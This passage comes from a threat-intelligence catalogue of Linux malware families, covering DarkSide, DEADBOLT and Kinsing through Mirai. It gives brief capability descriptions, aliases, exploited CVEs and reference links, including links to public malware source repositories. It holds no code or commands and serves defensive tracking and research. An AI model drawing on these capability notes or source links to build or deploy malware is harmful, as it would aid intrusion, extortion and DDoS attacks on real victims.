https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access

https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/

https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin

https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group

https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/

https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html

https://twitter.com/JAMESWT_MHT/status/1388301138437578757

https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/

https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636

https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/

https://abcnews.go.com/Politics/biden-speak-colonial-pipeline-attack-americans-face-gasoline/story?id=77666212

https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/darkside-ransomware-victims-sold-short/

https://www.youtube.com/watch?v=qxPXxWMI2i4

https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/

https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/

https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/

https://www.ic3.gov/Media/News/2021/211101.pdf

https://blog.gigamon.com/2021/05/17/tracking-darkside-and-ransomware-the-network-view/

https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted

https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/

https://otx.alienvault.com/pulse/60d0afbc395c24edefb33bb9

https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime

https://blog.group-ib.com/blackmatter2

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

ddoor

The tag is: misp-galaxy:malpedia="ddoor"

ddoor is also known as:

Table 2318. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.ddoor

https://github.com/rek7/ddoor

DEADBOLT

DEADBOLT is a linux ransomware written in Go, targeting QNAP NAS devices worldwide. The files are encrypted with AES128 encryption and will have the .deadbolt extension appended to file names.

The tag is: misp-galaxy:malpedia="DEADBOLT"

DEADBOLT is also known as:

Table 2319. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.deadbolt

https://www.bleepingcomputer.com/news/security/new-deadbolt-ransomware-targets-qnap-devices-asks-50-btc-for-master-key/

https://www.trendmicro.com/en_us/research/22/f/closing-the-door-deadbolt-ransomware-locks-out-vendors-with-mult.html

https://community.riskiq.com/article/1601124b

https://securelist.com/new-ransomware-trends-in-2022/106457/

Denonia

Cado discovered this malware, written in Go and targeting AWS Lambda environments.

The tag is: misp-galaxy:malpedia="Denonia"

Denonia is also known as:

Table 2320. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.denonia

https://thehackernews.com/2022/04/first-malware-targeting-aws-lambda.html

https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/

Dofloo

Dofloo (aka AESDDoS) is a popular malware used to create large scale botnets that can launch DDoS attacks and load cryptocurrency miners to the infected machines.

The tag is: misp-galaxy:malpedia="Dofloo"

Dofloo is also known as:

  • AESDDoS

Table 2322. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.dofloo

Echobot

The latest in this long line of Mirai scourges is a new variant named Echobot. Coming to life in mid-May, the malware was first described by Palo Alto Networks in a report published at the start of June, and then again in a report by security researchers from Akamai, in mid-June.

When it was first spotted by Palo Alto Networks researchers in early June, Echobot was using exploits for 18 vulnerabilities. In the Akamai report, a week later, Echobot was at 26.

The tag is: misp-galaxy:malpedia="Echobot"

Echobot is also known as:

Table 2327. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.echobot

https://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits—​targeting-scada

https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/

https://blogs.akamai.com/sitr/2019/06/latest-echobot-26-infection-vectors.html

https://unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/

https://www.bleepingcomputer.com/news/security/new-echobot-botnet-variant-uses-over-50-exploits-to-propagate/

EnemyBot

According to the Infosec Institute, EnemyBot is a dangerous IoT botnet that has made headlines in the last few weeks. This threat, which seems to be disseminated by the Keksec group, expanded its features by adding recent vulnerabilities discovered in 2022. It was designed to attack web servers, Android devices and content management systems (CMS) servers.

The tag is: misp-galaxy:malpedia="EnemyBot"

EnemyBot is also known as:

Table 2328. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.enemybot

https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory

https://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet

https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/

https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers

https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux

EvilGnome

According to Infosec Institute, EvilGnome presents itself to unwitting Linux users as a legitimate GNOME extension. Legitimate extensions help to extend Linux functionality, but instead of a healthy boost in system functionality, EvilGnome begins spying on users with an array of functionalities uncommon for most Linux malware types.

The tag is: misp-galaxy:malpedia="EvilGnome"

EvilGnome is also known as:

Table 2331. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.evilgnome

https://www.intezer.com/blog-evilgnome-rare-malware-spying-on-linux-desktop-users/

https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought

https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf

EwDoor

The tag is: misp-galaxy:malpedia="EwDoor"

EwDoor is also known as:

Table 2332. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.ewdoor

https://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/

Facefish

The tag is: misp-galaxy:malpedia="Facefish"

Facefish is also known as:

Table 2335. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.facefish

https://blog.netlab.360.com/ssh_stealer_facefish_en/

floodor

The tag is: misp-galaxy:malpedia="floodor"

floodor is also known as:

Table 2338. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.floodor

https://github.com/Thibault-69/Floodor

FontOnLake

This family utilizes custom modules allowing for remote access, credential harvesting (e.g. by modifying sshd) and proxy usage.

It comes with a rootkit as well.

The tag is: misp-galaxy:malpedia="FontOnLake"

FontOnLake is also known as:

Table 2340. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.fontonlake

https://www.welivesecurity.com/2021/10/07/fontonlake-previously-unknown-malware-family-targeting-linux/

FritzFrog

Guardicore has discovered FritzFrog, a sophisticated peer-to-peer (P2P) botnet which has been actively breaching SSH servers since January 2020. It is a worm which is written in Golang, and is modular, multi-threaded and fileless, leaving no trace on the infected machine’s disk.

The tag is: misp-galaxy:malpedia="FritzFrog"

FritzFrog is also known as:

Table 2341. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.fritzfrog

https://www.guardicore.com/2020/08/fritzfrog-p2p-botnet-infects-ssh-servers/

https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/

https://blog.netlab.360.com/p2p-botnets-review-status-continuous-monitoring/

https://www.securityweek.com/sophisticated-fritzfrog-p2p-botnet-returns-after-long-break

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://www.akamai.com/blog/security/fritzfrog-p2p

Gitpaste-12

Gitpaste-12 is a modular malware first observed in October 2020 targeting Linux based x86 servers, as well as Linux ARM and MIPS based IoT devices. It uses GitHub and Pastebin as dead drop C2 locations.

The tag is: misp-galaxy:malpedia="Gitpaste-12"

Gitpaste-12 is also known as:

Table 2342. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.gitpaste12

https://blogs.juniper.net/en-us/threat-research/gitpaste-12

Glupteba Proxy

ARM32 SOCKS proxy, written in Go, used in the Glupteba campaign.

The tag is: misp-galaxy:malpedia="Glupteba Proxy"

Glupteba Proxy is also known as:

Table 2343. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.glupteba_proxy

https://thehackernews.com/2022/03/over-200000-microtik-routers-worldwide.html

https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/

GobRAT

The tag is: misp-galaxy:malpedia="GobRAT"

GobRAT is also known as:

Table 2344. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.gobrat

https://blogs.jpcert.or.jp/en/2023/05/gobrat.html

Godlua

The tag is: misp-galaxy:malpedia="Godlua"

Godlua is also known as:

Table 2345. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.godlua

https://blog.netlab.360.com/an-analysis-of-godlua-backdoor-en/

GOSH

The tag is: misp-galaxy:malpedia="GOSH"

GOSH is also known as:

Table 2346. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.gosh

https://twitter.com/IntezerLabs/status/1291355808811409408

GoTitan

GoTitan is a DDoS bot under development, which support ten different methods of launching distributed denial-of-service (DDoS) attacks: UDP, UDP HEX, TCP, TLS, RAW, HTTP GET, HTTP POST, HTTP HEAD, and HTTP PUT.

The tag is: misp-galaxy:malpedia="GoTitan"

GoTitan is also known as:

Table 2347. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.gotitan

https://www.fortinet.com/blog/threat-research/gotitan-botnet-exploitation-on-apache-activemq

GreedyAntd

The tag is: misp-galaxy:malpedia="GreedyAntd"

GreedyAntd is also known as:

Table 2348. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.greedyantd

https://www.intezer.com/blog-technical-analysis-cryptocurrency-mining-war-on-the-cloud/

HabitsRAT (ELF)

The tag is: misp-galaxy:malpedia="HabitsRAT (ELF)"

HabitsRAT (ELF) is also known as:

Table 2350. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.habitsrat

https://twitter.com/michalmalik/status/1435918937162715139

HandyMannyPot

The tag is: misp-galaxy:malpedia="HandyMannyPot"

HandyMannyPot is also known as:

Table 2354. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.handymannypot

https://twitter.com/liuya0904/status/1171633662502350848

HiatusRAT

Lumen discovered this malware used in campaign targeting business-grade routers using a RAT they call HiatusRAT and a variant of tcpdump for traffic interception.

The tag is: misp-galaxy:malpedia="HiatusRAT"

HiatusRAT is also known as:

Table 2358. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.hiatus_rat

https://blog.lumen.com/new-hiatusrat-router-malware-covertly-spies-on-victims/

https://blog.lumen.com/hiatusrat-takes-little-time-off-in-a-return-to-action/

HiddenWasp

HiddenWasp is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statically linked ELF binary with stdlibc++.

The tag is: misp-galaxy:malpedia="HiddenWasp"

HiddenWasp is also known as:

Table 2359. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.hiddenwasp

https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/

https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/

https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought

HinataBot

HinataBot is a Go-based DDoS-focused botnet. It was observed in the first quarter of 2023 targeting HTTP and SSH endpoints leveraging old vulnerabilities and weak credentials. Amongst those infection vectors are exploitation of the miniigd SOAP service on Realtek SDK devices (CVE-2014-8361), Huawei HG532 routers (CVE-2017-17215), and exposed Hadoop YARN servers.

The tag is: misp-galaxy:malpedia="HinataBot"

HinataBot is also known as:

Table 2361. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.hinata_bot

https://www.akamai.com/blog/security-research/hinatabot-uncovering-new-golang-ddos-botnet

Hipid

The tag is: misp-galaxy:malpedia="Hipid"

Hipid is also known as:

Table 2362. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.hipid

https://blogs.jpcert.or.jp/en/2022/09/bigip-exploit.html

Hive (ELF)

The tag is: misp-galaxy:malpedia="Hive (ELF)"

Hive (ELF) is also known as:

Table 2363. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.hive

https://therecord.media/academics-publish-method-for-recovering-data-encrypted-by-the-hive-ransomware/

https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again

https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/

https://yoroi.company/research/on-the-footsteps-of-hive-ransomware/

https://securityaffairs.co/wordpress/128232/security/recover-files-hive-ransomware.html

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v

https://arxiv.org/pdf/2202.08477.pdf

https://yoroi.company/wp-content/uploads/2022/07/Yoroi-On-The-Footsteps-of-Hive-Ransomware.pdf

https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/

https://therecord.media/hive-ransomware-shuts-down-california-health-care-organization/

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf

https://twitter.com/ESETresearch/status/1454100591261667329

https://twitter.com/malwrhunterteam/status/1455628865229950979

https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/

https://github.com/reecdeep/HiveV5_file_decryptor

https://github.com/rivitna/Malware/tree/main/Hive

https://lifars.com/2022/02/how-to-decrypt-the-files-encrypted-by-the-hive-ransomware/

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html

https://blog.group-ib.com/hive

Horse Shell

Checkpoint Research describes this as part of a custom firmware image affiliated with the Chinese state-sponsored actor “Camaro Dragon”, a custom MIPS32 ELF implant. HorseShell, the main implant inserted into the modified firmware by the attackers, provides the attacker with 3 main functionalities: * Remote shell: Execution of arbitrary shell commands on the infected router * File transfer: Upload and download files to and from the infected router. * SOCKS tunneling: Relay communication between different clients.

The tag is: misp-galaxy:malpedia="Horse Shell"

Horse Shell is also known as:

Table 2364. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.horseshell

https://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/

Hubnr

The tag is: misp-galaxy:malpedia="Hubnr"

Hubnr is also known as:

Table 2365. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.hubnr

https://github.com/carbreal/Malware_Analysis/tree/master/Hubnr_botnet

HyperSSL (ELF)

The tag is: misp-galaxy:malpedia="HyperSSL (ELF)"

HyperSSL (ELF) is also known as:

  • SysUpdate

Table 2366. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.hyperssl

https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html

Icnanker

The tag is: misp-galaxy:malpedia="Icnanker"

Icnanker is also known as:

Table 2368. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.icnanker

https://blog.netlab.360.com/icnanker-trojan-downloader-shc-en/

IZ1H9

ccording to Fortinet, this is a Mirai-based DDoS botnet.

The tag is: misp-galaxy:malpedia="IZ1H9"

IZ1H9 is also known as:

Table 2372. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.iz1h9

https://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits

JenX

The tag is: misp-galaxy:malpedia="JenX"

JenX is also known as:

Table 2373. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.jenx

https://blog.radware.com/security/2018/02/jenx-los-calvos-de-san-calvicie/

Kaiji

Surfaced in late April 2020, Intezer describes Kaiji as a DDoS malware written in Go that spreads through SSH brute force attacks. Recovered function names are an English representation of Chinese words, hinting about the origin. The name Kaiji was given by MalwareMustDie based on strings found in samples.

The tag is: misp-galaxy:malpedia="Kaiji"

Kaiji is also known as:

Table 2374. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiji

https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/

https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/

https://intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/

https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775

https://www.bitdefender.com/box/blog/iot-news/kaiji-new-strain-iot-malware-seizing-control-launching-ddos-attacks/

https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/

Kaiten

According to netenrich, Kaiten is a Trojan horse that opens a back door on the compromised computer that allows it to perform other malicious activities. The trojan does not create any copies of itself. This Backdoor arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

The tag is: misp-galaxy:malpedia="Kaiten"

Kaiten is also known as:

  • STD

Table 2375. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiten

https://www.trendmicro.com/en_us/research/20/i/exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html

https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf

https://www.lacework.com/blog/the-kek-security-network/

https://www.blackarrow.net/attackers-abuse-mobileirons-rce-to-deliver-kaiten/

https://www.lacework.com/the-kek-security-network/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apache-log4j-zero-day

kfos

The tag is: misp-galaxy:malpedia="kfos"

kfos is also known as:

Table 2378. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.kfos

https://twitter.com/r3dbU7z/status/1378564694462586880

Kinsing

The tag is: misp-galaxy:malpedia="Kinsing"

Kinsing is also known as:

  • h2miner

Table 2379. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.kinsing

https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf

https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/

https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775

https://unit42.paloaltonetworks.com/atoms/moneylibra/

https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/

https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces

https://www.trendmicro.com/en_us/research/22/i/a-post-exploitation-look-at-coinminers-abusing-weblogic-vulnerab.html

https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability

https://www.trendmicro.com/en_us/research/20/k/analysis-of-kinsing-malwares-use-of-rootkit.html

https://sysdig.com/blog/zoom-into-kinsing-kdevtmpfsi/

https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/

https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts

https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/

https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039

https://twitter.com/IntezerLabs/status/1259818964848386048

https://www.trendmicro.com/en_us/research/21/g/threat-actors-exploit-misconfigured-apache-hadoop-yarn.html

https://redcanary.com/blog/kinsing-malware-citrix-saltstack/

https://unit42.paloaltonetworks.com/cve-2020-25213/

https://blog.aquasec.com/kinsing-malware-exploits-novel-openfire-vulnerability

https://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743

Krasue RAT

The tag is: misp-galaxy:malpedia="Krasue RAT"

Krasue RAT is also known as:

Table 2382. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.krasue_rat

https://www.group-ib.com/blog/krasue-rat/

Lady

The tag is: misp-galaxy:malpedia="Lady"

Lady is also known as:

Table 2383. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.lady

https://news.drweb.com/news/?i=10140&lng=en

LeetHozer

The tag is: misp-galaxy:malpedia="LeetHozer"

LeetHozer is also known as:

Table 2384. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.leethozer

https://blog.netlab.360.com/the-leethozer-botnet-en/

Lightning Framework

The tag is: misp-galaxy:malpedia="Lightning Framework"

Lightning Framework is also known as:

Table 2385. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.lightning

https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/

lilyofthevalley

The tag is: misp-galaxy:malpedia="lilyofthevalley"

lilyofthevalley is also known as:

Table 2387. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.lilyofthevalley

https://github.com/En14c/LilyOfTheValley

LiquorBot

BitDefender tracked the development of a Mirai-inspired botnet, dubbed LiquorBot, which seems to be actively in development and has recently incorporated Monero cryptocurrency mining features. Interestingly, LiquorBot is written in Go (also known as Golang), which offers some programming advantages over traditional C-style code, such as memory safety, garbage collection, structural typing, and even CSP-style concurrency.

The tag is: misp-galaxy:malpedia="LiquorBot"

LiquorBot is also known as:

Table 2388. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.liquorbot

https://labs.bitdefender.com/2020/01/hold-my-beer-mirai-spinoff-named-liquorbot-incorporates-cryptomining/

https://www.zdnet.com/article/naive-iot-botnet-wastes-its-time-mining-cryptocurrency/

LockBit (ELF)

The tag is: misp-galaxy:malpedia="LockBit (ELF)"

LockBit (ELF) is also known as:

Table 2389. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.lockbit

https://security.packt.com/understanding-lockbit/

https://www.bleepingcomputer.com/news/security/lockbit-victim-estimates-cost-of-ransomware-attack-to-be-42-million/

https://blog.compass-security.com/2022/03/vpn-appliance-forensics/

https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/

https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html

https://lifars.com/wp-content/uploads/2022/02/LockBitRansomware_Whitepaper.pdf

https://www.ic3.gov/Media/News/2022/220204.pdf

https://analyst1.com/ransomware-diaries-volume-1/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html

https://medium.com/@lcam/lighting-the-exfiltration-infrastructure-of-a-lockbit-affiliate-and-more-f57fbb7a4e79

https://analyst1.com/ransomware-diaries-volume-3-lockbits-secrets/

https://github.com/prodaft/malware-ioc/tree/master/PTI-257

https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/

https://www.crowdstrike.com/blog/better-together-global-attitude-survey-takeaways-2021/

https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/

https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html

https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-variants

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://securelist.com/crimeware-report-lockbit-switchsymb/110068/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://socradar.io/lockbit-3-another-upgrade-to-worlds-most-active-ransomware/

Loerbas

Loader and Cleaner components used in attacks against high-performance computing centers in Europe.

The tag is: misp-galaxy:malpedia="Loerbas"

Loerbas is also known as:

Table 2390. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.loerbas

https://twitter.com/nunohaien/status/1261281419483140096

https://atdotde.blogspot.com/2020/05/high-performance-hackers.html

https://www.cadosecurity.com/2020/05/16/1318/

Log Collector

The tag is: misp-galaxy:malpedia="Log Collector"

Log Collector is also known as:

Table 2391. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.log_collector

https://blog.netlab.360.com/dacls-the-dual-platform-rat/

Lootwodniw

The tag is: misp-galaxy:malpedia="Lootwodniw"

Lootwodniw is also known as:

Table 2392. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.lootwodniw

https://twitter.com/ddash_ct/status/1326887125103616000

Manjusaka (ELF)

Cisco Talos compared this RAT to Cobalt Strike and Sliver. Written in Rust.

The tag is: misp-galaxy:malpedia="Manjusaka (ELF)"

Manjusaka (ELF) is also known as:

Table 2394. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.manjusaka

https://github.com/avast/ioc/tree/master/Manjusaka

https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html

Matryosh

The tag is: misp-galaxy:malpedia="Matryosh"

Matryosh is also known as:

Table 2396. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.matryosh

https://blog.netlab.360.com/matryosh-botnet-is-spreading-en/

Midrashim

A x64 ELF file infector with non-destructive payload.

The tag is: misp-galaxy:malpedia="Midrashim"

Midrashim is also known as:

Table 2399. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.midrashim

https://www.guitmz.com/linux-midrashim-elf-virus/

https://github.com/guitmz/midrashim

Mirai (ELF)

Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.

The tag is: misp-galaxy:malpedia="Mirai (ELF)"

Mirai (ELF) is also known as:

  • Katana

Table 2401. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

https://www.cadosecurity.com/technical-analysis-of-the-ddos-attacks-against-ukrainian-websites/

https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/

https://socradar.io/what-you-need-to-know-about-russian-cyber-escalation-in-ukraine/

https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet

https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html

https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/

https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/

https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/

https://forensicitguy.github.io/extracting-indicators-from-packed-mirai/

https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093

https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx

https://unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/

https://unit42.paloaltonetworks.com/new-mirai-variant-mukashi/

https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/

https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/

https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign

https://www.netscout.com/blog/asert/ddos-attack-campaign-targeting-multiple-organizations-ukraine

https://cert.gov.ua/article/37139

https://exchange.xforce.ibmcloud.com/collection/InfectedNight-Mirai-Variant-With-Massive-Attacks-On-Our-Honeypots-dbea3e9e39b8265e729545fa798e4d18

https://isc.sans.edu/diary/22786

https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/

https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/

https://www.fortinet.com/blog/threat-research/multiple-malware-campaigns-target-vmware-vulnerability

https://blog.trendmicro.com/trendlabs-security-intelligence/mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902/

https://blog.trendmicro.com/trendlabs-security-intelligence/new-mirai-variant-expands-arsenal-exploits-cve-2020-10173/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tough-times-for-ukrainian-honeypot

http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/

https://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/

https://www.politie.nl/nieuws/2019/oktober/2/11-servers-botnet-offline.html

https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group

https://synthesis.to/2021/06/30/automating_string_decryption.html

https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/

https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html

https://blog.reversinglabs.com/blog/mirai-botnet-continues-to-plague-iot-space

